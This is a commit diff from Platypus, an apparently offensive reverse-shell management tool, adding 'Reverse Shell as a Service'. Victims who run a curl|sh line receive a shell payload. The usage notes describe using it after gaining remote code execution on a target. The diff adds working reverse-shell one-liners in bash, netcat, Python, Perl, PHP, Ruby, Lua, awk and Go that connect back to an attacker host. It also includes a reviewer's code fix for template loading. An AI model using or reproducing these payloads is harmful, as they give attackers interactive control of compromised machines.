[+] RaaS support specifying language via tpl #30, thanks for @RicterZ
WangYihang committed Jan 23, 2021
1 parent 9f80cc7 commit b9f47da
Showing 11 changed files with 58 additions and 18 deletions.
14 changes: 8 additions & 6 deletions USAGE.md
@@ -1,9 +1,11 @@
#### Reverse shell as a Service
```bash
// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port
## Reverse shell as a Service
Platypus is able to multiplexing the reverse shell listening port. The port 8080 can receive reverse shell client connection, also these is a Reverse Shell as a Service (RaaS) running on this port.

Assume that you have got an arbitrary rce on the target application, but the target application will strip the non-alph letter like `&`, `>`. then this feature will be useful.

To archive this, all you need is to construct a url which indicate the target

```bash
// victim will be redirected to attacker-host attacker-port
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
# curl http://192.168.1.2:8080/attacker.com/1337
Expand All @@ -17,7 +19,7 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh
# sh -c "$(curl http://host:port/)"
```
#### RESTful API
## RESTful API
* `GET /client` List all online clients
```
# curl 'http://127.0.0.1:9090/client'
53 changes: 41 additions & 12 deletions lib/context/server.go
Expand Up @@ -3,6 +3,7 @@ package context
import (
"bytes"
"fmt"
"io/ioutil"
"net"
"os"
"strconv"
Expand Down Expand Up @@ -86,6 +87,7 @@ func (s *TCPServer) Run() {
listener.Close()
return
default:
var err error
conn, err := listener.Accept()
if err != nil {
continue
Expand Down Expand Up @@ -126,24 +128,51 @@ func (s *TCPServer) Run() {
httpHost = headerValue
}
}
var command string = fmt.Sprintf(
"curl http://%s/%s/%d|sh\n",
httpHost,
GetHostname(httpHost),
GetPort(httpHost, s.Port),
)

// eg:
// "/python" -> {"", "python"}
// "/8.8.8.8/1337" -> {"", "8.8.8.8", "1337"}
// "/8.8.8.8/1337/python" -> {"", "8.8.8.8", "1337", "python"}
target := strings.Split(requestURI, "/")
if strings.HasPrefix(requestURI, "/") && len(target) == 3 {
host := target[1]
port, err := strconv.Atoi(target[2])
if err == nil {
command = fmt.Sprintf("bash -c 'bash -i >/dev/tcp/%s/%d 0>&1'\n", host, port)
} else {

// step 1: parse host and port, default set to the platypus listening port currently
host := GetHostname(httpHost)
var port uint16
port = GetPort(httpHost, s.Port)

if strings.HasPrefix(requestURI, "/") && len(target) > 2 {
host = target[1]
// TODO: ensure the format of port is int16
t, err := strconv.Atoi(target[2])
port = uint16(t)
if err != nil {
log.Debug("Invalid port number: %s", target[2])
}
} else {
log.Debug("Invalid HTTP Request-Line: %s", buffer[:n])
}

// step 2: parse language
language := "bash"
if len(target) > 0 {
// language is the last element of target
language = strings.Replace(target[len(target)-1], ".", "", -1)
}

// step 3: read template
// template rendering in golang tastes like shit,
// here we will trying to use string replace temporarily.
// read reverse shell template file from lib/template/rsh/*
templateFilename := fmt.Sprintf("lib/template/rsh/%s.tpl", language)
templateContent, _ := ioutil.ReadFile(templateFilename)

// step 4: render target host and port into template
renderedContent := string(templateContent)
renderedContent = strings.Replace(renderedContent, "__HOST__", host, -1)
renderedContent = strings.Replace(renderedContent, "__PORT__", strconv.Itoa(int(port)), -1)
command := fmt.Sprintf("%s\n", renderedContent)

// step 5: generate HTTP response
client.Write([]byte("HTTP/1.0 200 OK\r\n"))
client.Write([]byte(fmt.Sprintf("Content-Length: %d\r\n", len(command))))
client.Write([]byte("\r\n"))
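Review bot: The language is always taken from the last path element, so the two-segment form `/host/port` documented in the comment above (`"/8.8.8.8/1337" -> {"", "8.8.8.8", "1337"}`) and in USAGE.md resolves to `lib/template/rsh/1337.tpl`, which does not exist, and because the `ioutil.ReadFile` error is discarded the client receives `200 OK` with an empty body. The language should only be read from `target[3]` when four elements are present (or `target[1]` for the bare `/python` form), and a missing template should be logged and fall back to the `bash` template instead of silently producing an empty command; since `language` is interpolated into a filesystem path, checking it against the set of shipped templates would be a more robust guard than relying on the `/`-split and dot stripping. The assignment `port = uint16(t)` also runs before `err` is checked and silently truncates out-of-range values; `if err != nil || t < 1 || t > 65535 { log.Debug("Invalid port number: %s", target[2]) } else { port = uint16(t) }` keeps the default instead. The enclosing `Run` method starts and ends outside the hunk.
```go
// … unchanged: host/port defaults from httpHost …
// step 2: parse language; only the bare "/python" and the full
// "/host/port/python" forms carry one — "/host/port" keeps the default.
language := "bash"
switch {
case len(target) >= 4 && target[3] != "":
	language = strings.Replace(target[3], ".", "", -1)
case len(target) == 2 && target[1] != "":
	language = strings.Replace(target[1], ".", "", -1)
}

// step 3: read template; a missing template must not become an empty 200 response
templateFilename := fmt.Sprintf("lib/template/rsh/%s.tpl", language)
templateContent, err := ioutil.ReadFile(templateFilename)
if err != nil {
	log.Debug("Unknown language %q (%s), falling back to bash", language, err)
	templateContent, err = ioutil.ReadFile("lib/template/rsh/bash.tpl")
	if err != nil {
		log.Debug("Reading fallback template: %s", err)
	}
}
// … unchanged: step 4 rendering and step 5 response …
```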
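--- a/lib/template/rsh/awk.tpl
+++ b/lib/template/rsh/awk.tpl
@@ -0,0 +1 @@
+awk 'BEGIN {s = "/inet/tcp/0/__HOST__/__PORT__"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null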
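--- a/lib/template/rsh/bash.tpl
+++ b/lib/template/rsh/bash.tpl
@@ -0,0 +1 @@
+bash -c 'bash -i >/dev/tcp/__HOST__/__PORT__ 0>&1'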
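--- a/lib/template/rsh/go.tpl
+++ b/lib/template/rsh/go.tpl
@@ -0,0 +1 @@
+echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","__HOST__:__PORT__");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go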
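--- a/lib/template/rsh/lua.tpl
+++ b/lib/template/rsh/lua.tpl
@@ -0,0 +1 @@
+lua -e "require('socket');require('os');t=socket.tcp();t:connect('__HOST__','__PORT__');os.execute('/bin/sh -i <&3 >&3 2>&3');"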
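--- a/lib/template/rsh/nc.tpl
+++ b/lib/template/rsh/nc.tpl
@@ -0,0 +1 @@
+nc -c /bin/bash __HOST__ __PORT__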
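--- a/lib/template/rsh/perl.tpl
+++ b/lib/template/rsh/perl.tpl
@@ -0,0 +1 @@
+perl -e 'use Socket;$i="__HOST__";$p=__PORT__;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'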
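--- a/lib/template/rsh/php.tpl
+++ b/lib/template/rsh/php.tpl
@@ -0,0 +1 @@
+php -r '$sock=fsockopen("__HOST__",__PORT__);shell_exec("/bin/sh -i <&3 >&3 2>&3");'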
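--- a/lib/template/rsh/python.tpl
+++ b/lib/template/rsh/python.tpl
@@ -0,0 +1 @@
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("__HOST__",__PORT__));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'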
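--- a/lib/template/rsh/ruby.tpl
+++ b/lib/template/rsh/ruby.tpl
@@ -0,0 +1 @@
+ruby -rsocket -e'f=TCPSocket.open("__HOST__",__PORT__).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'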
